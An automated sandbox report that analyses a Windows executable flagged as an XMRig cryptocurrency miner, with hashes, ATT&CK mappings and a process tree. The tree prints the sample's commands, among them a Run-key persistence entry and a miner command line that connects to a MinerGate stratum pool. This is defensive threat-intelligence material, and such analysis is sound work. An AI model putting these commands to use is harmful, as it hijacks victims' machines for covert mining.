xmrig | 5827d439da4c6728c49d4d6e3377ddcb37254c6a478a8df7bbd7c2c2f392fb71

General

Target

f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe
Size

1.7MB
MD5

f61b5f5f259f47b3638f43aeb8e7a745
SHA1

1aac7b282c121d231a595a753912290d40bde606
SHA256

5827d439da4c6728c49d4d6e3377ddcb37254c6a478a8df7bbd7c2c2f392fb71
SHA512

c830e17a5c53e7cedd5da092445d0bcdd1a1245c1bd7d0d560808899023f6d0f5d1d441d0db4be76211fc00ee5628334b14b250a4f3320540280c5f86ea39eab
SSDEEP

24576:rmoO8itEqfZLNlddoSQD4yviVtkJPCk63eSrLLT85/8UrU3RXJgC2HMkUM1BIbFN:qvZLNlwTcyviIPEtLL45/8UrMRqfAKml

Score

10^/10

xmrig discovery miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 15 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023441-24.dat	xmrig
behavioral2/memory/1564-26-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-27-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-28-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-29-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-30-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-31-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-32-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-33-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-34-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-35-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-36-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-37-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-38-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig
behavioral2/memory/1564-39-0x0000000000400000-0x00000000008A6000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Executes dropped EXE 1 IoCs

pid	Process
1564	SystemRoot.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemRoot = "C:\\SystemRoot\\Winlogon.vbs"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1564	SystemRoot.exe
Token: SeLockMemoryPrivilege	1564	SystemRoot.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3724 wrote to memory of 1052	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	82
PID 3724 wrote to memory of 1052	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	82
PID 3724 wrote to memory of 1052	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	82
PID 3724 wrote to memory of 4740	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	85
PID 3724 wrote to memory of 4740	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	85
PID 3724 wrote to memory of 4740	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	85
PID 3724 wrote to memory of 1816	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	86
PID 3724 wrote to memory of 1816	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	86
PID 3724 wrote to memory of 1816	3724	f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe	86
PID 1052 wrote to memory of 560	1052	cmd.exe	88
PID 1052 wrote to memory of 560	1052	cmd.exe	88
PID 1052 wrote to memory of 560	1052	cmd.exe	88
PID 4740 wrote to memory of 3852	4740	WScript.exe	89
PID 4740 wrote to memory of 3852	4740	WScript.exe	89
PID 4740 wrote to memory of 3852	4740	WScript.exe	89
PID 3852 wrote to memory of 1564	3852	cmd.exe	91
PID 3852 wrote to memory of 1564	3852	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\f61b5f5f259f47b3638f43aeb8e7a745_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\SystemRoot\Microsoft.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1052
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v SystemRoot /t REG_SZ /d "C:\SystemRoot\Winlogon.vbs"
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:560
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\SystemRoot\Winlogon.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\SystemRoot\Start.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\SystemRoot\SystemRoot.exe
      SystemRoot.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x --cpu-priority 3 --max-cpu-usage 20 --donate-level 1
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\SystemRoot\move.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\SystemRoot\Microsoft.bat

Filesize
127B

MD5
386738537fe68e7f168666d686f9ff0b

SHA1
94afb132e87b071c6fe4e30aee11c085fda2733f

SHA256
855b194355e18033143bdf99e3b07055d1f224413c505410584a0c6fb11d5e39

SHA512
fce3d034175ee5ed44f3930bd0071e18fdaa13f842d4b97dbc0df6c70561b635fd07e331393374ae090c944587b1e16e5e158471010a6deb2f34566748020788

Download Submit
C:\SystemRoot\Start.bat

Filesize
161B

MD5
1abcb471b018b2eca4c3c48aea798de9

SHA1
2f0c212b890829617ddd3fa75529951e006411cd

SHA256
85c1536230357a9b52ddcc8a22a4575c5755440e1383d000122abad85cd40bc7

SHA512
8686cf39f0bb986dbc2d3f1b1ee8e019e049338eb8ecb9e01333baebe4745a9825ea649fb2dc02cb7036bad34194a67f987bbb6be40731e4ceae68cd71bdb997

Download Submit
C:\SystemRoot\SystemRoot.exe

Filesize
4.6MB

MD5
5d9458583dcbcbc38f8ffc3af5b74347

SHA1
30255d9221c42eaf90aba6f8fc5b86eeee2661c0

SHA256
d550d0c5c4754ba7be67ecdb0b927016556e64514fcb68a85dd3e7bfe880c490

SHA512
d9760587f6ff0c4c1165683ae1fbd26d342abdeeec08c3c29c11a3d35ab0182a78f88e329ad18e1df8d16c96b33b05ad35c1685406c3651b26f3f7365fa5f7c0

Download Submit
C:\SystemRoot\Winlogon.lnk

Filesize
2KB

MD5
bc9245216e6cf059424f828db78369a2

SHA1
f0d536c6ce51cf9a16a118ca1522b2163ecd0afa

SHA256
8c674b3bfb8d0a0e613502806cce816458fd5def6d086eb3b094455e79d48642

SHA512
b7aa7a4a6da34d6c7f64a197613f7991675b8ba4e72d0d8f16b90d6c68db3e577bf973ae10868f72fe531c369ba49c717149948778bcca971691f3331a62848b

Download Submit
C:\SystemRoot\Winlogon.vbs

Filesize
79B

MD5
1e914d0c6864e6d048ebc11084c9dfb5

SHA1
788e1a47b630dafd1de05f07d99aeaddb2a9f277

SHA256
fd39cab22f1fb48066cc5f443746af2e8e759906dff0880bb0199ce08b484ccb

SHA512
8755a8a537d873c52dc4d333f45a357ca8d24775c57cd360d420cc49080072aba8a5317c5c2e59a31b9a35a923dc278672da6305145fd74b6195dedd724b6b8b

Download Submit
C:\SystemRoot\move.bat

Filesize
101B

MD5
dc178e0220438f8259266e5ed66778df

SHA1
09f49c4e020140b094c09dbc7a8d5bb3e8a5d70f

SHA256
e1c7df4d3778b84edbc1633311592480845220f921861da2adbc895fcb951ba4

SHA512
3f3dbd8284e327e7c225ff3fcda1632b73b0dfb8a77c4577886a9921f9e789113799896010253cf4756dbc3a49527b62a591e52442d760b9f9f0efc249629652

Download Submit
memory/1564-29-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-32-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-27-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-28-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-25-0x0000000000C50000-0x0000000000C60000-memory.dmp

Filesize
64KB

Download
memory/1564-30-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-31-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-26-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-33-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-34-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-35-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-36-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-37-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-38-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download
memory/1564-39-0x0000000000400000-0x00000000008A6000-memory.dmp

Filesize
4.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads